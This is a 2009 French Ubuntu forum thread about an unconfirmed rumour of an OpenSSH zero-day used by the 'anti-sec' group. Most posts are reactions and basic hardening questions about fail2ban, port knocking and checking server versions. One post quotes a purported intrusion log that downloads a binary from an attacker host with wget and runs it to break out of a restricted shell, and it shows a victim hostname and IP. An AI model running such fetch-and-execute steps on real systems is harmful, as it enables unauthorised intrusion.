Contenu | Rechercher | Menus

Annonce

Si vous avez des soucis pour rester connecté, déconnectez-vous puis reconnectez-vous depuis ce lien en cochant la case
Me connecter automatiquement lors de mes prochaines visites.

À propos de l'équipe du forum.

Pages : 1

#1 Le 09/07/2009, à 09:50

®om

[Rumeur?] Faille 0-day remote-exploit dans OpenSSH?

tux-planet a écrit :

Un groupe de hackers, qui se nomme anti-sec, aurait réussi à pirater le serveur de l'un des administrateurs du site underground Astalavista.com. Ces derniers auraient exploité une faille de sécurité dans OpenSSH. Cette attaque fait beaucoup parler d'elle en ce moment, dans les réseaux underground et parmi les experts en sécurité, car celle-ci est de type Zero day.

http://www.tux-planet.fr/astalavista-pw … sec-group/

http://linuxfr.org/~Julien04/28520.html

Pour l'instant, ce n'est pas confirmé : réponse du mainteneur principal d'OpenSSH.

Dernière modification par tshirtman (Le 24/11/2010, à 23:13)

®om's blog

Hors ligne

#2 Le 09/07/2009, à 10:00

DrDam

Re : [Rumeur?] Faille 0-day remote-exploit dans OpenSSH?

pas mal .. chapeau les mec

Tout ce qui a été crée par l'Homme devrait être patrimoine de l'humanité
Vous etes perdu ?, là ce sera trop loin

Hors ligne

#3 Le 09/07/2009, à 10:02

®om

Re : [Rumeur?] Faille 0-day remote-exploit dans OpenSSH?

Si c'est vrai, j'ai bien aimé cette partie :

sh-3.1$ env
MANPATH=/usr/lib/courier-imap/man:
HOSTNAME=srv01.webhostline.com
SHELL=/usr/local/cpanel/bin/jailshell
TERM=xterm
HISTSIZE=1000
SSH_CLIENT=13.33.33.37 35154 2222
SSH_TTY=/dev/pts/1
USER=crownvip
MAIL=/var/spool/mail/infosec
PWD=/home/crownvip
INPUTRC=/etc/inputrc
JAVA_HOME=/usr/local/jdk
EDITOR=pico
LANG=en_US.UTF-8
HOME=/home/crownvip
SHLVL=4
LS_OPTIONS=--color=tty -F -a -b -T 0
LOGNAME=crownvip
CVS_RSH=ssh
VISUAL=pico
SSH_CONNECTION=13.33.33.37 35154 66.96.220.213 2222
CLASSPATH=.:/usr/local/jdk/lib/classes.zip
LESSOPEN=|/usr/bin/lesspipe.sh %s
HISTFILE=/dev/null
G_BROKEN_FILENAMES=1
_=/usr/bin/env


// Awww, jailshell... 

sh-3.1$ wget http://anti.sec.labs/MichaelScofield
--13:33:37--  http://anti.sec.labs/MichaelScofield
Resolving anti.sec.labs... 13.33.33.37
Connecting to anti.sec.labs|13.33.33.37|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4921 (4.8K) [text/plain]
Saving to: `MichaelScofield'

100%[=========================================================================================================================================>] 4,921       --.-K/s   in 0.08s

11:27:57 (64.0 KB/s) - `MichaelScofield' saved [4921/4921]

sh-3.1$ chmod +x MichaelScofield

sh-3.1$ ./MichaelScofield

	[+] MichaelScofield - Prison Breaker / anti-sec group
	[+] Grabbing environment variables...
	
	SHELL=/usr/local/cpanel/bin/jailshell
	
	[+] Injecting new shell..
	
	[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
	
	SHELL=/bin/sh

sh-3.1$ env
MANPATH=/usr/lib/courier-imap/man:
HOSTNAME=srv01.webhostline.com
SHELL=/bin/sh
TERM=xterm
HISTSIZE=1000
SSH_CLIENT=13.33.33.37 35154 2222
SSH_TTY=/dev/pts/1
USER=crownvip
MAIL=/var/spool/mail/infosec
PWD=/home/crownvip
INPUTRC=/etc/inputrc
JAVA_HOME=/usr/local/jdk
EDITOR=pico
LANG=en_US.UTF-8
HOME=/home/crownvip
SHLVL=4
LS_OPTIONS=--color=tty -F -a -b -T 0
LOGNAME=crownvip
CVS_RSH=ssh
VISUAL=pico
SSH_CONNECTION=13.33.33.37 35154 66.96.220.213 2222
CLASSPATH=.:/usr/local/jdk/lib/classes.zip
LESSOPEN=|/usr/bin/lesspipe.sh %s
HISTFILE=/dev/null
G_BROKEN_FILENAMES=1
_=/usr/bin/env


// Prison Break FTW.

®om's blog

Hors ligne

#4 Le 09/07/2009, à 10:21

DrDam

Re : [Rumeur?] Faille 0-day remote-exploit dans OpenSSH?

c'est là ou si je tente une comparaison ... eux ils savent peindre une toile de maitre ... moi ... je mordille le pinceau lol:lol:

Tout ce qui a été crée par l'Homme devrait être patrimoine de l'humanité
Vous etes perdu ?, là ce sera trop loin

Hors ligne

#5 Le 09/07/2009, à 11:39

Bigcake

Re : [Rumeur?] Faille 0-day remote-exploit dans OpenSSH?

Rumeur ou pas, le sujet reste vraiment très intéressant.

"Les gens" ne sont pas cons, ils ont été habitués à la facilité et à la désinformation. Le meilleur moyen de ne pas les aider, c'est de se moquer. Le meilleur moyen de les aider, c'est de les informer, encore et encore. La réflexion viendra. N'oubliez pas que vous aussi, vous êtes le con d'un autre.
Smartphone+GNU/Linux=Librem5

Hors ligne

#6 Le 09/07/2009, à 11:59

Compte0

Re : [Rumeur?] Faille 0-day remote-exploit dans OpenSSH?

Une 0days sur openSSH... Si c'est vrai, y'a de quoi flipper un peu bcp. Alors si la version des log est bon et que la faille ne touche que cette version ( la 4.3 ), la Jaunty devrai être à peut prés tranquille ( openssh en version 1.5 ). Par sécurité je pense que je vais ajouter un knockd, en plus...

Q-DOS ( Quick & Dirty Operating System) + MS (MicroSoft) = MS-DOS (MicroSoft Dirty Operating System)

Hors ligne

#7 Le 11/07/2009, à 15:40

wido

Re : [Rumeur?] Faille 0-day remote-exploit dans OpenSSH?

Bonjour, maintenant imageshack en effacant des images d'un serveur et en le remplacant par leur message:
16278011134a5869c021fca.jpg
http://www.zataz.com/news/19231/anti-se … shack.html

Archlinux | Reddit | ODROID-XU4

Hors ligne

#8 Le 11/07/2009, à 15:51

®om

Re : [Rumeur?] Faille 0-day remote-exploit dans OpenSSH?

Pour des hackers, c'est assez étonnant d'être contre la "totale divulgation" (full-disclosure).

En fait ils veulent faire partie d'une "élite" et garder les exploits pour eux, et sont contre les "scripts kiddies"… Raisonnement assez étrange…

®om's blog

Hors ligne

#9 Le 11/07/2009, à 16:01

thurston

Re : [Rumeur?] Faille 0-day remote-exploit dans OpenSSH?

je comprends pas tout mais je trouve ca inquiétant.
Je me connecte en ssh chez mon père.
mes questions:
1. est ce que fail2ban est efficace dans ce cas là et aurait pu limiter la casse?
2. un truc que je trouve bizarre, si je fais ssh -v, j'ai plutot OpenSSH_5.1p1 que 1.5?? (jaunty), et je vois version 1.5 dans les posts?
3. knockd ca a l'air pas mal, ca vaut l'install?

A+
Thurston

Dernière modification par thurston (Le 11/07/2009, à 16:03)

Hors ligne

#10 Le 11/07/2009, à 16:38

Compte0

Re : [Rumeur?] Faille 0-day remote-exploit dans OpenSSH?

1. Fail2ban est utile pour lutter contre le brute force. Comme on ne sait rien de l'attaque, il est difficile de dire quelque chose... Au pifomètre, je dirai que, si c'est un 0days, alors ça devrai pas être en brute-forçant. Mais, franchement, je suis au delà de mes ( minimes ) compétences...
2. Le serveur openSSH de Ubuntu est surement patché, ça change pas grand chose.
3. Ben pas de port ouvert, pas d'attaque.

Q-DOS ( Quick & Dirty Operating System) + MS (MicroSoft) = MS-DOS (MicroSoft Dirty Operating System)

Hors ligne

#11 Le 11/07/2009, à 16:55

®om

Re : [Rumeur?] Faille 0-day remote-exploit dans OpenSSH?

thurston a écrit :

si je fais ssh -v, j'ai plutot OpenSSH_5.1p1 que 1.5?? (jaunty), et je vois version 1.5 dans les posts?

C'est bien 5.1 :

$ ssh -V
OpenSSH_5.1p1 Debian-5ubuntu1, OpenSSL 0.9.8g 19 Oct 2007

®om's blog

Hors ligne

#12 Le 11/07/2009, à 22:24

Grunt

Re : [Rumeur?] Faille 0-day remote-exploit dans OpenSSH?

C'est pas la version du client SSH, ça?

Ce qui compte pour une faille est la version du serveur:

telnet serveur 22
Trying 192.168.0.200...
Connected to serveur.
Escape character is '^]'.
SSH-2.0-OpenSSH_5.1p1 Debian-5

#13 Le 11/07/2009, à 22:37

wido

Re : [Rumeur?] Faille 0-day remote-exploit dans OpenSSH?

http://www.google.fr/search?client=oper … 8&oe=utf-8
lol?

Archlinux | Reddit | ODROID-XU4

Hors ligne

Pages : 1